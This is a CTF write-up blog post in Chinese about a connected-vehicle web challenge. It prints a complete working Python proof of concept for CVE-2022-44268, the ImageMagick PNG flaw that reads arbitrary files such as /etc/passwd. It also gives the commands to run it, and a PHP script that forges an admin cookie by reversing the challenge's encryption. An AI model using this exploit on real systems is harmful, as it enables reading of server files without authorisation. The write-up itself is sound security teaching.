【2023饶派杯车联网CTF】Web-对访客开放的车载系统 writeup

已于 2023-06-01 23:34:57 修改
阅读量614 收藏 2
点赞数 1
分类专栏: Web 文章标签: 网络安全 web安全 计算机网络
于 2023-06-01 08:38:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ShangYaoPaiGu/article/details/130980913
版权

0x01 题目:

对访客开放的车载系统,进入环境:http://172.35.8.73/

image-20230531094745262

0x02 题解:

在登入页面使用字典跑一遍,发现Guest/Guest可以登入:

image-20230531094915874

进入后页面:

image-20230531094938097

根据hint,涉及到的漏洞CVE-2022-44268

利用代码如下:

#!/usr/bin/env python3
import sys
import png
import zlib
import argparse
import binascii
import logging

logging.basicConfig(stream=sys.stderr, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
d = zlib.decompressobj()
e = zlib.compressobj()
IHDR = b'\x00\x00\x00\n\x00\x00\x00\n\x08\x02\x00\x00\x00'
IDAT = b'x\x9c\xbd\xcc\xa1\x11\xc0 \x0cF\xe1\xb4\x03D\x91\x8b`\xffm\x98\x010\x89\x01\xc5\x00\xfc\xb8\n\x8eV\xf6\xd9' \
       b'\xef\xee])%z\xef\xfe\xb0\x9f\xb8\xf7^J!\xa2Zkkm\xe7\x10\x02\x80\x9c\xf3\x9cSD\x0esU\x1dc\xa8\xeaa\x0e\xc0' \
       b'\xccb\x8cf\x06`gwgf\x11afw\x7fx\x01^K+F'


def parse_data(data: bytes) -> str:
    _, data = data.strip().split(b'\n', 1)
    print(data.replace(b'\n', b''))
    return binascii.unhexlify(data.replace(b'\n', b'')).decode()


def read(filename: str):
    if not filename:
        logging.error('you must specify a input filename')
        return

    res = ''
    p = png.Reader(filename=filename)
    for k, v in p.chunks():
        logging.info("chunk %s found, value = %r", k.decode(), v)
        if k == b'zTXt':
            name, data = v.split(b'\x00', 1)
            res = parse_data(d.decompress(data[1:]))

    if res:
        sys.stdout.write(res)
        sys.stdout.flush()


def write(from_filename, to_filename, read_filename):
    if not to_filename:
        logging.error('you must specify a output filename')
        return

    with open(to_filename, 'wb') as f:
        f.write(png.signature)
        if from_filename:
            p = png.Reader(filename=from_filename)
            for k, v in p.chunks():
                if k != b'IEND':
                    png.write_chunk(f, k, v)
        else:
            png.write_chunk(f, b'IHDR', IHDR)
            png.write_chunk(f, b'IDAT', IDAT)

        png.write_chunk(f, b"tEXt", b"profile\x00" + read_filename.encode())
        png.write_chunk(f, b'IEND', b'')


def main():
    parser = argparse.ArgumentParser(description='POC for CVE-2022-44268')
    parser.add_argument('action', type=str, choices=('generate', 'parse'))
    parser.add_argument('-i', '--input', type=str, help='input filename')
    parser.add_argument('-o', '--output', type=str, help='output filename')
    parser.add_argument('-r', '--read', type=str, help='target file to read', default='/etc/passwd')
    args = parser.parse_args()
    if args.action == 'generate':
        write(args.input, args.output, args.read)
    elif args.action == 'parse':
        read(args.input)
    else:
        logging.error("bad action")


if __name__ == '__main__':
    main()

使用前记得安装一个pypng包安装代码如下:

pip3 install pypng

或者

python3 -m pip install pypng

先获取一下index.php使用指令如下:

./poc.py generate -o poc.png -r './index.php'

生成一个poc.png图片文件,然后上传到服务器,再右键图片下载下来,利用脚本进行解析:

./poc.py parse -i 6476fa0eb4cf4.png

同理可以任意读取user.phpupload.php,但是在这个过程中遇到点bug:

image-20230531182809088

这是由于代码中包含很多特殊字符,导致在处理图片文件时出现错误,这里进行修改,把对应的源数据用python的函数bytes.fromhex()进行解析,解析不了就去掉一些头或者尾

可能是原作者在内容处理没有做过多的修饰(

下面是通过任意读取获得的user.php内容:

······(省略一坨无效代码
<?php\r\n    include("function.php");
$cookie = $_COOKIE['login_cookie'];
$decodedCookie = myDecrypt($cookie);
if ($decodedCookie === "admin") {
  $isAdmin = true;
}
if ($isAdmin) {
  $content = system("/readflag");
  echo "<p>" . htmlspecialchars($content) . "</p>";
} \r\n    ?>\r\n</body>\r\n</html>\r\n'

代码比较乱,但是可以在后面找到一个include("function.php");,并且有一个myDecrypt()函数,可以合理猜测获取flag关键的一步应该在function.php中。

继续上上面的步骤读取“function.php”,整理一下可以得到以下内容:

<?php
  function myDecrypt($data, $key="hello"){
    $data = base64_decode($data);
    $salt = substr(md5($key), 0, 8); //生成加密盐
    $iv = substr($data, 0, 16); // 提取随机因素    
    $data = substr($data, 16); // 提取加密后的数据
    $data = openssl_decrypt($data, 'AES-256-CBC', $salt.$key, OPENSSL_RAW_DATA, $iv); 
    // 使用 AES-256 进行对称解密
    $data = str_rot13($data);
    $data = base64_decode($data);
    $data = gzuncompress($data);
    //对字符串进行反变化
    
    $data = str_replace('5', 'u', $data);
    $data = str_replace('4', 'o', $data);
    $data = str_replace('3', 'i', $data);
    $data = str_replace('2', 'e', $data);
    $data = str_replace('1', 'a', $data);
    $data = strrev($data);
    return $data; //admin -> 1dm3n
 }

可以发现这又是一个套娃解密,反过来写就行了,就是要注意一下$data = substr($data, 16);在加密函数中应该是$data = $iv.$data;

最后得到的脚本应该是这样的:

$key="hello";
$data = "admin";
$data = strrev($data);
$data = str_replace('u', '5', $data);
$data = str_replace('o', '4', $data);
$data = str_replace('i', '3', $data);
$data = str_replace('e', '2', $data);
$data = str_replace('a', '1', $data);
$data = gzcompress($data);
$data = base64_encode($data);
echo("\n1base:".$data."\n");
$data = str_rot13($data);
echo("\n2rot:".$data."\n");
$salt = substr(md5($key), 0, 8); //生成加密盐
$iv = substr($data, 0, 16); // 提取随机因素
//$data = substr($data, 16); // 提取加密后的数据
//$data = "a111111111111111".$data;
$data = openssl_encrypt($data, 'AES-256-CBC', $salt.$key, OPENSSL_RAW_DATA, $iv); 
echo("\n3aes:".$data."\n");
$data = $iv.$data;

echo("\n4add:".$data."\n");
$data = base64_encode($data);
echo("\n5result:".$data."\n");
echo(myDecrypt($data));

运行结果:

1base: eJzLM85NMQQABTcBpA==

2rot: rWmYZ85AZDDNOGpOcN==

3aes: ?6??!J??k?:????L??_g_y4???f-

4add: rWmYZ85AZDDNOGpO?6??!J??k?:????L??_g_y4???f-

5result: cldtWVo4NUFaREROT0dwT/c2hqsaIUrCxmsCpzoakpar40yNnV9nX3k0yeu17mYt

admin

把得到的result放到cookie中的login_cookie字段,访问/user.php就可以拿到flag了

image-20230531224304860

q1jun
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
车联网安全知识点总结
网安君的博客
10-26 3267
随着信息安全和智能网联汽车的发展,汽车的信息安全越来越受到人们的重视。高通公司总裁兼CEO安蒙称“汽车已经变成车轮上的联网计算机,汽车公司也已经转变为科技公司”。随着互联网技术的发展迭代,汽车已经可以通过无线通信网络连接到互联网,成为互联网上的终端设备。智能化和功能多样化也增加的黑客利用各种安全漏洞对汽车实施攻击和控制的可能性。
智能网联汽车 天融信 信息安全攻防赛 2023 CTF真题
07-14
智能网联汽车 天融信 信息安全攻防赛 2023 CTF真题
蔚来汽车李泉:车联网时代,如何用技术与终端守护汽车安全
wangluoanquan111的博客
12-27 814
2015年“白帽黑客”査理•米勒(Charlie Miller)和克里斯•瓦拉塞克(Chis hlmlk)演示了如何通过入侵克莱斯勒公司Ucomect车裁系统,以远程指令方式“劫持”正在行驶中的 Jeep 自由光,并导致其翻车。诸如此类汽车入侵事件随着汽车智能化后越来越多的被报道出,一连串对智能网联汽车的攻击破解使得人们对其安全性打上了一个大大的问号,汽车网络安全的话题越来越受关注,这也是造车新势力除了性能以外最重视的一个部分。蔚来汽车作为沉淀了多年的新能源车企,是目前“造车新势力”中热度最高的一家。
一次线上ctf的网络协议分析
qq_50854662的博客
09-16 292
拿到的是两个东西 我们先看secret.log 很多乱码但是有一串16进制数 把这段复制下来,我们放到HxD看 点击新建,直接粘贴 发现不对,观察头部,发现少了一个数(5) 因为加上5就是一个rar头部 即 导出来,改成ya.rar 要密码 我们看password.pcapng 输入过滤找post 有些很奇怪的东西 查询后知道这是jsfuck加密 先点击追踪符 然后再选tcp流 这么个东西 直接sava到桌面,后缀就用txt 拉倒jsfuck部分 中间有奇怪的乱码
攻防实战 | 记一次打穿某车企全过程
2302_76672693的博客
08-01 121
攻防实战 | 记一次打穿某车企全过程
车联网开源组件BusyBox漏洞分析及复现(CVE-2022-30065)
蛇矛实验室
02-21 850
近日,国内多家安全实验室检测到了针对于智能网联汽车中使用都开源项目busybox漏洞,国外在2022年5月份报告了此漏洞,目前已经发布的CVE信息如下,信息中指出Busybox1.35-x版本中,awk应用由于use after free导致拒绝服务漏洞或可能获取代码执行权限。
2021 CVVD首届车联网漏洞挖掘赛线上初赛 Writeup
SkYe's Blog
05-09 2562
jwt 原题 https://blog.csdn.net/weixin_46676743/article/details/113726655 带着 Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImVicmVidW5hIiwicGFzc3dvcmQiOiIiLCJhZG1pbiI6ImdlaHIiLCJpYXQiOjE2MjA0NTgwMzJ9.QkpCPfCtmMmeEYRoLFzzT8ag7mIaIPIcbZLZAB
CTF WriteUp】2020数字中国创新大赛部分题解
cccchhhh6819的博客
04-20 1925
(好难啊~不会做啊) Crypto Can you get flag from GM crypto system 观察代码,程序生成的p和q要满足一些条件,其中有一条比较奇怪 pow(q ** 2 * x, (p-1)/2, p) + pow(p ** 2 * x, (q-1)/2, q) == N - phi - 1 我们知道 N = p * q,phi = (p - 1) * (q - 1)...
【重磅】“饶派”XCTF车联网安全挑战赛明日开赛!
Cyberpeace的博客
05-30 616
饶派”XCTF车联网安全挑战赛明日开赛!
饶派”XCTF车联网安全挑战赛|倒计时3天!
Cyberpeace的博客
05-28 107
饶派”XCTF车联网安全挑战赛——倒计时3天❗
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
De1ctf 2020 -‘check in’ writeup
01-09
这道题很有意思,考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过 文件内容过滤了很多字符 perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents! ...
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
CTFCTFHub------web-信息泄露-备份文件下载
从零开始的网安生活
07-23 733
文章目录备份文件下载网站源码 备份文件下载 网站源码 1.根据提示进行猜测,或使用御剑等扫描工具扫描是否有备份文件,找到备份文件并下载 2.解压发现flag文档,但打开后并没有flag 3.观察文档,发现将文档文件名用网页打开,获得flag ...
饶派XCTF车联网安全挑战赛Reverse GotYourKey
最新发布
m0_59598029的博客
03-14 319
有一个方法是根据buffer来截取后一段数据,照着程序逻辑分析可以得出buffer分三段,一段是下标0~3,中间一段是topic(stringData),最后一段是messageData。将解密后的dex文件用jadx打开,可以发现大部分逻辑还是和之前的结果一样,最主要的差别就是check函数不同,这里是rc4加密和rc4最后调用的base64加密。再往下看可以看到"goodluck"字符串,这可能是加密密钥,跟进之后可以发现是一个rc4加密。主要在于check方法,跟进可以发现是aes加密。
CTFHub-web备份文件下载(转)
qq_45290991的博客
06-12 363
技能树-备份文件下载 网站源码bak文件vim缓存.DS_Store 网站源码 1. 分析题目 看样子,应该是这些文件名和后缀的组合 2. 简单写个python脚本 找到哪个组合可以访问 import requests url = “h...
IDA Pro7.0使用技巧总结使用
寻梦&之璐
11-07 3885
俗话说,工欲善其事,必先利其器,在二进制安全的学习中,使用工具尤为重要,而IDA又是玩二进制的神器,以前在使用IDA的时候,只是用几个比较常用的功能,对于IDA的其他功能没有去研究,于是本着学习的精神,参考着《IDA pro权威指南》(第二版),写下这篇文章,记录自己的学习心得,下面的记录都是在Windows平台下的IDA pro7.0进行的 一些二进制工具 在《IDA pro权威指南》的开篇一两章中,先是介绍了几款常用于二进制研究的工具,我这里简单的记了几个,介绍一波: C++filt: 可以用于显示出c
车联网安全
weixin_43977912的博客
03-11 1957
1、智能汽车安全如何分类? 智能汽车终极发展阶段是无人驾驶,车联网则是无人驾驶实现的基础,然而车联网技术应用过程中却会带来信息安全问题,具体可分为以下三种: 一、用户隐私 汽车智能化是建立在车辆动态数据收集及应用上的,如车辆行驶、车体、动力、安全及环境数据等层面, 尤其是车辆行驶数据一直都被视为变现的大数据金矿,无论是车联网前装的车商,还是车联网后装的互联网科技公司,都在用户不知情的情况下收集车主驾驶历史数据,除了自用外,甚至还会商业变卖给第三方使用,由此造成用户隐私泄露危险(本文属于原创,猫视汽车首发,转
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值